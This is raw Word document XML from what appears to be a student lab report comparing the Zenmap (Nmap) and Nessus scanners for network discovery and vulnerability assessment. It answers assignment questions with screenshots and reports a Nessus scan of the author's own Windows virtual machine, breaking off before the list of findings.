          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>5. Reporting and Analysis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F644B96" w14:textId="5AD9FC6C"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Zenmap GUI: Zenmap provides basic reporting capabilities, allowing users to save scan results in various formats, including XML, grepable, and Nmap Scripting Engine (NSE) output. However, it does not offer advanced reporting features or comprehensive vulnerability management functionalities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4BE7D" w14:textId="0DB4599A" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="008547A0">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>- Nessus: Nessus excels in reporting and analysis. It generates detailed reports with prioritized vulnerability findings, severity ratings, and recommended remediation steps. Nessus also integrates with other security tools and platforms, making it suitable for larger organizations with complex vulnerability management needs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FCAB23" w14:textId="77777777" w:rsidR="00722CC6" w:rsidRPr="00722CC6" w:rsidRDefault="00722CC6" w:rsidP="00722CC6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB19073" w14:textId="453E1C94" w:rsidR="007260EE" w:rsidRPr="007260EE" w:rsidRDefault="00722CC6" w:rsidP="00C55D1E">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00722CC6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>In summary, Zenmap GUI (Nmap) is an open-source network scanning tool focused on network exploration, while Nessus is a commercial vulnerability scanner with advanced scanning, reporting, and analysis capabilities. The choice between the two depends on the specific requirements of the task at hand, the level of detail needed, and the budget available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E983517" w14:textId="1135BE19" w:rsidR="00DB4629" w:rsidRPr="00D020D3" w:rsidRDefault="00DB4629"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Which scanning application is better for performing a network discovery reconnaissance probing of an IP network infrastructure?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EADE1D" w14:textId="63A6E6BF" w:rsidR="007260EE" w:rsidRPr="00D020D3" w:rsidRDefault="007260EE" w:rsidP="007260EE">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066F9D96" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="00ED56FE">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5416">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>For performing network discovery reconnaissance probing of an IP network infrastructure, Nmap (utilized through Zenmap GUI) is generally considered a better choice compared to Nessus. Here's why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD3327" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="009F5416">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A0005C" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="008547A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5416">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1. Network Discovery Capabilities: Nmap is renowned for its robust network discovery capabilities. It can efficiently identify live hosts, map the network topology, and discover open ports and services running on those hosts. Nmap employs a variety of scanning techniques, including ping sweeps, TCP/UDP port scanning, and OS fingerprinting, making it suitable for comprehensive network reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033AB52D" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="009F5416">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E452B1A" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="008547A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5416">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Speed and Efficiency: Nmap is known for its speed and efficiency in scanning large IP networks. It is designed to perform fast and accurate scans, allowing you to quickly obtain an overview of the network infrastructure. Nmap's efficient algorithms and parallel scanning capabilities contribute to its effectiveness in network discovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9387A6" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="009F5416">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CC7B7CF" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="008547A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5416">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>3. Customization and Flexibility: Nmap provides extensive customization options, allowing you to tailor your scans to suit your specific requirements. You can define scan parameters, specify target IP ranges, choose different scan techniques, and even create custom scripts using the Nmap Scripting Engine (NSE). This flexibility is particularly useful for network reconnaissance, where you may want to focus on specific ports or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E34522" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="00A80AC8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE00763" w14:textId="77777777" w:rsidR="009F5416" w:rsidRPr="009F5416" w:rsidRDefault="009F5416" w:rsidP="008547A0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F5416">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Open-Source and Free: Nmap is an open-source tool and is freely available, which makes it accessible to a wide range of users. Its open nature also allows for continuous development and community contributions, ensuring regular updates and improvements to the tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40398A7F" w14:textId="55CA7EED" w:rsidR="00DB4629" w:rsidRPr="00D020D3" w:rsidRDefault="00DB4629"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Which scanning application is better for performing a software vulnerability assessment with suggested remediation steps?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034EED3A" w14:textId="4F3A9471" w:rsidR="007260EE" w:rsidRPr="00D020D3" w:rsidRDefault="007260EE" w:rsidP="007260EE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2499290D" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>For performing a software vulnerability assessment with suggested remediation steps, Nessus is generally considered a better choice compared to Nmap (Zenmap GUI). Here's why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C899A9" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04BBBC3E" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>1. Vulnerability Assessment Focus: Nessus is specifically designed for vulnerability assessment, making it highly effective in identifying software vulnerabilities, misconfigurations, and security weaknesses in network devices, operating systems, applications, and databases. It offers a comprehensive database of vulnerability checks and actively scans for known vulnerabilities using a wide range of techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313153D1" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C6942BB" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>2. Extensive Vulnerability Knowledge Base: Nessus maintains an extensive vulnerability knowledge base, regularly updated with the latest security vulnerabilities and their associated remediation steps. This allows Nessus to provide detailed and accurate vulnerability findings, along with specific suggestions for mitigating each vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D31D68C" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C00B829" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Reporting and Remediation Guidance: Nessus excels in generating detailed vulnerability assessment reports. It categorizes vulnerabilities based on severity and provides prioritized recommendations for remediation. These reports include detailed </w:t>
      </w:r>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>information about each vulnerability, including its impact, the affected software versions, and step-by-step instructions on how to address the identified issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A5EE1D" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72AC93B1" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>4. Integration and Scalability: Nessus is designed to integrate with other security tools and platforms, making it suitable for larger organizations with complex vulnerability management needs. It supports integration with vulnerability management solutions, ticketing systems, and security information and event management (SIEM) platforms, allowing for streamlined vulnerability remediation workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AAE03D" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73697693" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>5. Commercial Support: Nessus is a commercial product offered by Tenable, which provides dedicated customer support, product updates, and access to additional features. The commercial support ensures timely assistance for any issues or questions that may arise during vulnerability assessments and remediation processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF6CD41" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2D072A" w14:textId="77777777" w:rsidR="00A641FF" w:rsidRPr="00A641FF" w:rsidRDefault="00A641FF" w:rsidP="00A641FF">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A641FF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>While Nmap (Zenmap GUI) can provide basic information about open ports and services, it does not offer the same level of in-depth vulnerability assessment and remediation guidance as Nessus. Nmap is primarily focused on network exploration and port scanning, whereas Nessus is specifically designed for vulnerability assessment, making it a more suitable choice for comprehensive software vulnerability assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A94900" w14:textId="54742CA1" w:rsidR="00E64AC0" w:rsidRDefault="00DB4629"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How many total scripts (i.e., test scans) does the Intense Scan using Zen</w:t>
      </w:r>
      <w:r w:rsidR="000642AC" w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00D020D3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ap GUI perform?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CC2634" w14:textId="2112A20D" w:rsidR="005A1DF7" w:rsidRDefault="005A1DF7" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A4A66C" w14:textId="038ECE35" w:rsidR="005A1DF7" w:rsidRDefault="00892E2B" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00892E2B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18897C88" wp14:editId="54E9CF17">
            <wp:extent cx="5943600" cy="2880360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="203855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58282" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2880360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D486B" w14:textId="6DB6982A" w:rsidR="00892E2B" w:rsidRPr="00892E2B" w:rsidRDefault="00A16336" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Zenmap use 156 scripts to do the intense scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DFCE7" w14:textId="07E0F0DC" w:rsidR="009A0FA8" w:rsidRDefault="009A0FA8"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How many IP hosts were identified in the Nessus vulnerability scan? List them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0119CD57" w14:textId="40FFDF7B" w:rsidR="005A1DF7" w:rsidRDefault="005A1DF7" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Answer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7D7C6D" w14:textId="3615EB1C" w:rsidR="005A1DF7" w:rsidRDefault="004F6E92" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F6E92">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12F38572" wp14:editId="08B4A9AD">
            <wp:extent cx="5943600" cy="2856865"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="149230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9873" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2856865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="004F6E92">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004F6E92">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EBAC6DC" wp14:editId="41596C1D">
            <wp:extent cx="5943600" cy="2897505"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="210163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4004" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2897505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AA4DB9" w14:textId="36E7F331" w:rsidR="004F6E92" w:rsidRDefault="004F6E92" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I use nessus to scan one of my windows virtual machine. There are totally 19 vulnerabilities have been detected by Nessus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1596FC29" w14:textId="295115A2" w:rsidR="000D685E" w:rsidRDefault="000D685E" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Some of them can be listed: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D685E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70976B9A" w14:textId="72B40700" w:rsidR="00C30DDC" w:rsidRDefault="00C30DDC" w:rsidP="005A1DF7">
      <w:pPr>
        <w:ind w:left="66" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C30DDC">
        <w:rPr>
